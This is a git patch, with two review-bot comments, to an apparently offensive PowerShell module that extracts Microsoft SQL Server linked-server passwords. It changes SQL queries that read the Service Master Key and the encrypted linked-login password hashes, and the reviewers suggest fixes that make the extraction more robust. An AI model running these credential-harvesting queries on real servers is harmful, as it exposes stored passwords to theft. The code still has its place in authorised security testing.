From 606153b890f831e94890ef85793451b28ead0433 Mon Sep 17 00:00:00 2001
From: Jorge Henrique Nunes de Vasconcelos
Date: Mon, 4 Feb 2019 14:13:49 -0300
Subject: [PATCH] Changed function to get the length of Smk and password hash. Fixes #3
---
 Get-MSSQLLinkPasswords.psm1 | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/Get-MSSQLLinkPasswords.psm1 b/Get-MSSQLLinkPasswords.psm1
index 2644dd7..513d802 100644
--- a/Get-MSSQLLinkPasswords.psm1
+++ b/Get-MSSQLLinkPasswords.psm1
@@ -71,7 +71,7 @@ function Get-MSSQLLinkPasswords{
 if ($Conn.State -eq "Open"){
 # Query Service Master Key from the database - remove padding from the key
 # key_id 102 eq service master key, thumbprint 3 means encrypted with machinekey
- $SqlCmd="SELECT substring(crypt_property,9,len(crypt_property)-8) FROM sys.key_encryptions WHERE key_id=102 and (thumbprint=0x03 or thumbprint=0x0300000001)"
+ $SqlCmd="SELECT substring(crypt_property,9,datalength(crypt_property)-8) FROM sys.key_encryptions WHERE key_id=102 and (thumbprint=0x03 or thumbprint=0x0300000001)"
 $Cmd = New-Object System.Data.SqlClient.SqlCommand($SqlCmd,$Conn);
 $SmkBytes=$Cmd.ExecuteScalar()
@@ -97,7 +97,7 @@ function Get-MSSQLLinkPasswords{
 # Remove header from pwdhash, extract IV (as iv) and ciphertext (as pass)
 # Ignore links with blank credentials (integrated auth ?)
 $SqlCmd = "SELECT sysservers.srvname,syslnklgns.name,substring(syslnklgns.pwdhash,5,$ivlen) iv,substring(syslnklgns.pwdhash,$($ivlen+5),
- len(syslnklgns.pwdhash)-$($ivlen+4)) pass FROM master.sys.syslnklgns inner join master.sys.sysservers on syslnklgns.srvid=sysservers.srvid WHERE len(pwdhash)>0"
+ datalength(syslnklgns.pwdhash)-$($ivlen+4)) pass FROM master.sys.syslnklgns inner join master.sys.sysservers on syslnklgns.srvid=sysservers.srvid WHERE datalength(pwdhash)>0"
 $Cmd = New-Object System.Data.SqlClient.SqlCommand($SqlCmd,$Conn);
 $Data=$Cmd.ExecuteReader()
 $Dt = New-Object "System.Data.DataTable"
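Review bot: The new `datalength(crypt_property)` call in the @@ -71,7 hunk carries no comment saying why it replaced `len()`, so a later cleanup could switch it back. I would add above the query `# datalength() returns the byte count; len() ignores trailing 0x20 bytes in varbinary data and can truncate the key`. Separately, `$SmkBytes=$Cmd.ExecuteScalar()` is null when no key_encryptions row matches the filter. How that case is handled is not visible here because the function body continues outside the hunk, so it is worth confirming.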
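Review bot: In the @@ -97,7 hunk the filter `WHERE datalength(pwdhash)>0` still admits rows whose pwdhash is shorter than the 4-byte header plus the IV. For those rows `datalength(syslnklgns.pwdhash)-$($ivlen+4)` is negative, and SQL Server's substring() raises an error on a negative length, which fails the whole query. Tightening the filter to `WHERE datalength(pwdhash)>$($ivlen+4)` keeps the length argument positive. `$ivlen` is set outside the hunk, so I am assuming it is a locally computed integer.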